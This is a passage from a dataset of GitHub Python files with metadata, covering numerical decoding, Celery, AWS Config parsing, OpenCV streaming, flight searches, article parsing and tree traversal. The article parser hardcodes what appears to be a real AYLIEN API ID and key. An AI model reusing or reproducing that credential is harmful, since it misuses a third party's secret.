8)\r\n\r\n ys = np.zeros(7 * 7)\r\n VL_rs = []\r\n\r\n for s1 in range(0, 7):\r\n for s2 in range(0, 7):\r\n s_mat = [[sx[s1], 0], [0, sy[s2]]]\r\n VL_rs.append(normal(V * rm * s_mat))\r\n ys[s1 * 7 + s2] = eval_KL(VL_rs[s1 * 7 + s2], X_tr, k)\r\n\r\n y[p] = np.amin(ys)\r\n VL_r[p] = VL_rs[np.argmin(ys)]\r\n\r\n else:\r\n VL_r.append(normal(np.matmul(V, rm)))\r\n ys = 
eval_KL(VL_r[p], X_tr.T, k)\r\n y[p] = np.mean(ys)\r\n\r\n plt.plot(y)\r\n plt.xlabel('Rotation Angle')\r\n plt.ylabel('KL Divergence')\r\n plt.title('2D Rotation')\r\n plt.axvline(x=np.argmin(y))\r\n plt.show()\r\n\r\n V_out = VL_r[np.argmin(y)]\r\n\r\n peak_inds, peak_properties = find_peaks((np.amax(y) - y) / np.amax(y), height=0.0)\r\n\r\n peak_heights = peak_properties['peak_heights']\r\n\r\n descending_inds = np.argsort(peak_heights)[::-1]\r\n flip_inds = peak_inds[descending_inds]\r\n\r\n #V_flip = VL_r[flip_inds.tolist()]\r\n V_flip = []\r\n for i in range(len(peak_inds)):\r\n V_flip.append(VL_r[peak_inds[i]])\r\n\r\n return V_out, V_flip, y, flip_inds\r\n\r\n\r\ndef eval_KL(X, X_out, k=0):\r\n b_size = 50\r\n\r\n if k == 0:\r\n k0 = np.round(np.power(X.shape[1], 1 / 3))\r\n k1 = np.round(np.power(X_out.shape[1], 1 / 3))\r\n else:\r\n k0 = k1 = k\r\n\r\n\r\n if X.shape[1] == 3:\r\n p_train = prob_grid_3D(normal(X).T, b_size, k0)\r\n p_rot = prob_grid_3D(normal(X_out).T, b_size, k1)\r\n elif X.shape[1] == 2:\r\n p_train = prob_grid(normal(X).T, b_size, k0)\r\n p_rot = prob_grid(normal(X_out).T, b_size, k1)\r\n\r\n return error_nocenter(np.log(p_train), np.log(p_rot), X.shape[1])\r\n\r\n\r\ndef prob_grid_3D(X, b_size=50, k=0):\r\n return prob_grid(X[:, 0:2], b_size, k)\r\n\r\n\r\ndef prob_grid(X, b_size=50, k=0):\r\n w_size = 1\r\n\r\n X_n = X\r\n\r\n xy_max = np.amax(X_n) + w_size\r\n xy_min = np.amin(X_n) - w_size\r\n\r\n grid_axis = np.linspace(xy_min, xy_max, b_size)\r\n\r\n x1, y1 = np.meshgrid(grid_axis, grid_axis)\r\n\r\n return prob1(np.column_stack((x1.flatten('F'), y1.flatten('F'))), X_n.T, k)\r\n\r\n\r\ndef error_nocenter(p_train, p_rot, dim, num=1):\r\n if dim == 3:\r\n L = np.floor(np.power(p_train.shape[0], 1 / 3)).astype(int)\r\n pt = np.reshape(p_train, (L, L, L))\r\n pr = np.reshape(p_rot, (L, L, L))\r\n\r\n L_mid = np.floor(L / 2).astype(int)\r\n bd = np.zeros((L, L, L))\r\n bd[L_mid - num : L_mid + num, L_mid - num : L_mid + num, L_mid - num : L_mid + num] = 1\r\n\r\n elif dim == 2:\r\n L = np.floor(np.power(p_train.shape[0], 1 / 2)).astype(int)\r\n pt = np.reshape(p_train, (L, L))\r\n pr = np.reshape(p_rot, (L, L))\r\n\r\n L_mid = np.floor(L / 2).astype(int)\r\n bd = np.zeros((L, L))\r\n bd[L_mid - num: L_mid + num, L_mid - num: L_mid + num] = 1\r\n\r\n inds = bd != 1\r\n\r\n return np.linalg.norm(pt[inds] - pr[inds]) / np.linalg.norm(pr[inds])\r\n", "repo_name": "nerdslab/DAD", "sub_path": "decoder/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 12059, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.size", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 54, "usage_type": "attribute"}, {"api_name": 
"scipy.linalg.sqrtm", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.manifold.MDS", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.decomposition.FactorAnalysis", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.manifold.Isomap", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "decoder.utils.color_data", "line_number": 80, "usage_type": "call"}, {"api_name": "decoder.utils", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "decoder.utils.color_data", "line_number": 83, "usage_type": "call"}, {"api_name": "decoder.utils", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "time.time", "line_number": 91, "usage_type": "call"}, {"api_name": "time.time", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 176, "usage_type": "call"}, 
{"api_name": "numpy.log", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "numpy.amin", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.power", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.matlib", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.matlib", "line_number": 210, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.matlib", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.meshgrid", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 224, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 236, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 243, 
"usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.cross", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 244, "usage_type": "attribute"}, {"api_name": "numpy.cross", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 246, "usage_type": "attribute"}, {"api_name": "numpy.linalg", "line_number": 247, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 263, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "numpy.argmin", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "numpy.argmin", "line_number": 301, "usage_type": "call"}, {"api_name": "scipy.signal.find_peaks", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 323, "usage_type": "call"}, {"api_name": 
"numpy.power", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 364, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 372, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 378, "usage_type": "attribute"}]} +{"seq_id": "41818125580", "text": "import sys\nimport numpy as np\nfrom celery import Celery \n\napp = Celery('test', broker='pyamqp://guest@localhost//')\n\ndis2 = 100\nprint(dis2)\n\n@app.task\ndef testing():\n dis = [10, 30, 100]\n global dis2 \n dis2 = np.min(dis)\n print(dis2)\n\ntesting()\n\nprint(dis2)", "repo_name": "lukegwoolley/Zumo-Robot", "sub_path": "Web control/Flask/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "celery.Celery", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "27533636409", "text": "import os\nimport json\n\n\nfile = \"528884874493_Config_us-east-1_ConfigHistory_AWS__AutoScaling__AutoScalingGroup_20181011T012430Z_20181011T012430Z_1.json\"\n\n\nwith open (file, 'r') as json_file:\n json_obj = json.load(json_file)\n json_str = json_obj['configurationItems']\n for i in json_str:\n print(i['resourceType'])\n break\n\n\ndef main():\n download_objects(bucket, work_dir)\n file_paths = get_all_file_paths('.')\n unzip_files(file_paths)\n file_paths2 = get_all_file_paths('.')\n for file in file_paths2:\n if file.endswith('.json'):\n with open (file, 'r') as json_file:\n try:\n json_obj = json.load(json_file)\n json_str = json_obj['configurationItems']\n new_dict = {}\n for i in json_str:\n new_dict['dBInstanceIdentifier'] = i['configuration']['dBInstanceIdentifier']\n new_dict['dBInstanceClass'] = i['configuration']['dBInstanceClass']\n new_dict['dBInstanceStatus'] = i['configuration']['dBInstanceStatus']\n new_dict['dbiResourceId'] = i['configuration']['dbiResourceId']\n new_dict['configurationItemCaptureTime'] = i['configurationItemCaptureTime']\n new_dict['dBInstanceArn'] = i['configuration']['dBInstanceArn']\n new_dict['instanceCreateTime'] = i['configuration']['instanceCreateTime']\n new_dict['resourceId'] = i['resourceId']\n new_dict['awsAccountId'] = 
i['awsAccountId']\n try:\n cursor.execute(\"insert into Inventory_awsrds(resourceId, dBInstanceClass, dBInstanceStatus, configurationItemCaptureTime, dBInstanceArn, dBInstanceIdentifier) values (?,?,?,?,?,?)\",str(new_dict['resourceId']),str(new_dict['dBInstanceClass']),str(new_dict['dBInstanceStatus']),str(new_dict['configurationItemCaptureTime']),str(new_dict['dBInstanceArn']),str(new_dict['dBInstanceIdentifier']))\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n os.remove(file)", "repo_name": "the-indian-saint/AWS-Scripts", "sub_path": "DynamoDB/Working/autoScaling.py", "file_name": "autoScaling.py", "file_ext": "py", "file_size_in_byte": 2252, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "38578840964", "text": "import cv2, time # time is needed for the time.sleep call below\n\nclass VideoStream:\n\n def __init__(self,width,height):\n self.width = width;\n self.height = height;\n\n def VideoStreaming(self,source):\n video = cv2.VideoCapture(source)\n cv2.namedWindow(\"Stream started ...\",cv2.WINDOW_AUTOSIZE)\n cv2.moveWindow(\"Stream started ...\",500,100)\n cv2.startWindowThread()\n try:\n while True:\n ret, frame = video.read()\n if ret:\n resize = cv2.resize(frame,(1280,720))\n videoColor = cv2.cvtColor(resize,cv2.COLOR_BGR2RGB)\n gray = videoColor.copy()\n gray = cv2.cvtColor(gray,cv2.COLOR_BGR2GRAY)\n videoShow = cv2.resize(videoColor,(self.width,self.height))\n videoShow = cv2.cvtColor(videoShow,cv2.COLOR_BGR2RGB)\n cv2.imshow(\"Face-dec Video\",videoShow)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break\n cv2.destroyAllWindows()\n video.release()\n time.sleep(4)\n except:\n pass\n return 0\n", "repo_name": "digitalknigth/Recognition-Test", "sub_path": "VideoStream.py", "file_name": "VideoStream.py", "file_ext": "py", "file_size_in_byte": 1175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.VideoCapture", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.WINDOW_AUTOSIZE", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.moveWindow", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.startWindowThread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "74236237955", "text": "# This file will need to use the DataManager, 
FlightSearch,\n# FlightData, NotificationManager classes to achieve the program requirements.\n\nimport requests\nimport data_manager, \\\n flight_data, \\\n flight_search, \\\n notification_manager\nimport config\nimport collections\nimport datetime\n\n# --- kiwi api\nCITIES = ['Paris', 'Berlin', 'Tokyo', 'Sydney', 'Istanbul', 'Kuala Lumpur', 'New York', 'San Francisco', 'Cape Town']\nKIWI_API_KEY = config.KIWI_API_KEY\nKIWI_BASE_URL = 'enter base url'\nKIWI_LOCATIONS_ENDPOINT = 'enter locations endpoint'\n\nkiwi_locations_url = KIWI_BASE_URL + KIWI_LOCATIONS_ENDPOINT\n\nkiwi_locations_parameters = {\n 'term': ''\n}\n\nkiwi_locations_headers = {\n 'apikey': KIWI_API_KEY\n}\n\nIATA_CODES = collections.defaultdict()\n# print(IATA_CODES)\n\nfor city in CITIES:\n kiwi_locations_parameters['term'] = city\n response = requests.get(url=kiwi_locations_url, params=kiwi_locations_parameters, headers=kiwi_locations_headers)\n iata_code = response.json()['locations'][0]['code']\n IATA_CODES[city] = iata_code\n# ---\n\ndata_manager = data_manager.DataManager()\n# data_manager.bulk_update_desired_flight_deals_information(IATA_CODES)\n\nflight_search = flight_search.FlightSearch(data_manager_obj=data_manager)\nflights_info = flight_search.get_flights_info(\n date_from=datetime.date.today(),\n date_to=datetime.date.today() + datetime.timedelta(weeks=6),\n nights_in_dst_from=7,\n nights_in_dst_to=28,\n max_stopovers=1,\n via_city='Ho Chi Minh'\n)\n# print(flights_info)\n\nflight_data = flight_data.FlightData(flights_info)\n\nif len(flight_data.flights_data_per_city) > 0:\n notification_manager = notification_manager.NotificationManager()\n\n for cheap_flight_info in flight_data.flights_data_per_city:\n notification_manager.send_sms_notification(cheap_flight_info)\n notification_manager.send_email_notification(cheap_flight_info)\nelse:\n print('No available flights.')\n", "repo_name": "imaadfakier/cheap-flight-deals", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "config.KIWI_API_KEY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "data_manager.DataManager", "line_number": 39, "usage_type": "call"}, {"api_name": "flight_search.FlightSearch", "line_number": 42, "usage_type": "call"}, {"api_name": "flight_search.get_flights_info", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 44, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 45, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "flight_data.FlightData", "line_number": 53, "usage_type": "call"}, {"api_name": "flight_data.flights_data_per_city", "line_number": 55, "usage_type": "attribute"}, {"api_name": "notification_manager.NotificationManager", "line_number": 56, "usage_type": "call"}, {"api_name": "flight_data.flights_data_per_city", "line_number": 58, "usage_type": "attribute"}, {"api_name": "notification_manager.send_sms_notification", "line_number": 59, "usage_type": "call"}, {"api_name": 
"notification_manager.send_email_notification", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "28640504284", "text": "import requests\nimport articleDateExtractor\n\ndef Parser( url ):\n\n search = 'https://api.aylien.com/api/v1/extract?url=' + url\n\n headers = {\n \"X-AYLIEN-TextAPI-Application-ID\":\"f94984be\",\n \"X-AYLIEN-TextAPI-Application-Key\":\"83a7b904239577d9967e5402c461f388\"\n }\n\n req = requests.get(url = search, headers=headers) \n data = req.json()\n\n date = articleDateExtractor.extractArticlePublishedDate(url)\n #date = articleDateExtractor.extractArticlePublishedDate(\"http://techcrunch.com/2015/11/29/tyro-payments/\")\n\n formattedDate = date\n #print(date)\n if( date != None ):\n formattedDate = str(date).replace(\"-\", \"\")\n formattedDate = formattedDate[:-9]\n formattedDate = int(formattedDate)\n #print(formattedDate)\n\n parsed = {\n 'title': data['title'],\n 'author': data['author'],\n 'article': data['article'],\n 'date': formattedDate\n }\n\n return parsed\n\nprint(Parser('https://www.cnet.com/news/google-plus-and-life-after-social-media-death/'))", "repo_name": "landeneagan/TigerHacks2018", "sub_path": "Parser.py", "file_name": "Parser.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "articleDateExtractor.extractArticlePublishedDate", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "4499029222", "text": "from monitoring import watcher\nfrom multiprocessing import Process\n\n# Set the inputs\nfilename_experimental_data1 = \"R1_data_in_moles.csv\"\nfilename_experimental_data2 = \"R2_data_in_moles.csv\"\n\n\nalpha_lower_bound = \"-1000\"\nalpha_upper_bound = \"1000\"\nbeta_lower_bound = \"-1000\"\nbeta_upper_bound = \"1000\"\n\nmodel_for_parest_1 = \"parameter_estimation/model_mu_1\"\nmodel_for_parest_2 = \"parameter_estimation/model_mu_2\"\nmodel_for_parest_3 = \"parameter_estimation/model_mu_3\"\nmodel_for_parest_4 = \"parameter_estimation/model_mu_4\"\n\noutput_1 = \"output_1.csv\"\noutput_2 = \"output_2.csv\"\noutput_3 = \"output_3.csv\"\noutput_4 = \"output_4.csv\"\n\nSheet = 'Sheet1'\nSheet_2 = 'Channel 5'\nSheet_3 = 'Channel 6'\nSheet_4 = 'Channel 7'\n\n# Multiprocessing of the watcher and parameter estimation file\n\np1 = Process(target=watcher,\n args=(output_1, filename_experimental_data1, filename_experimental_data2, alpha_lower_bound,\n alpha_upper_bound, beta_lower_bound, beta_upper_bound, model_for_parest_1, Sheet))\n\np2 = Process(target=watcher,\n args=(output_2, filename_experimental_data1, filename_experimental_data2, alpha_lower_bound,\n alpha_upper_bound, beta_lower_bound, beta_upper_bound, model_for_parest_2, Sheet_2))\n\np3 = Process(target=watcher,\n args=(output_3, filename_experimental_data1, filename_experimental_data2, alpha_lower_bound,\n alpha_upper_bound, beta_lower_bound, beta_upper_bound, model_for_parest_3, Sheet_3))\n\np4 = Process(target=watcher,\n args=(output_4, filename_experimental_data1, filename_experimental_data2, alpha_lower_bound,\n alpha_upper_bound, beta_lower_bound, beta_upper_bound, model_for_parest_4, Sheet_4))\np1.start()\np2.start()\np3.start()\np4.start()\n\ntry:\n p1.join()\n p2.join()\n p3.join()\n p4.join()\n\nexcept KeyboardInterrupt:\n print('program exit')\n", "repo_name": "biosustain/fermentation-mpc", "sub_path": "old_stuff/run_parallel_monitoring.py", "file_name": 
"run_parallel_monitoring.py", "file_ext": "py", "file_size_in_byte": 1892, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "multiprocessing.Process", "line_number": 31, "usage_type": "call"}, {"api_name": "monitoring.watcher", "line_number": 31, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 35, "usage_type": "call"}, {"api_name": "monitoring.watcher", "line_number": 35, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 39, "usage_type": "call"}, {"api_name": "monitoring.watcher", "line_number": 39, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 43, "usage_type": "call"}, {"api_name": "monitoring.watcher", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "5582609700", "text": "#!/usr/bin/python\n# -*- encoding: utf-8 -*-\nfrom typing import List\n\nfrom tree import TreeNode\n\n\n# 二叉树的层序遍历\nclass Solution:\n @staticmethod\n def level_order(root: TreeNode) -> List[List[int]]:\n \"\"\"\n 二叉树层序遍历\n \"\"\"\n if not root:\n return []\n result = []\n queue = [root]\n while queue:\n size = len(queue)\n level_nodes = []\n while size > 0:\n temp = queue.pop(0)\n level_nodes.append(temp.val)\n if temp.left:\n queue.append(temp.left)\n if temp.right:\n queue.append(temp.right)\n size -= 1\n result.append(level_nodes)\n return result\n", "repo_name": "xiaoqiangjava/python-algorithm", "sub_path": "learn/102.py", "file_name": "102.py", "file_ext": "py", "file_size_in_byte": 780, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 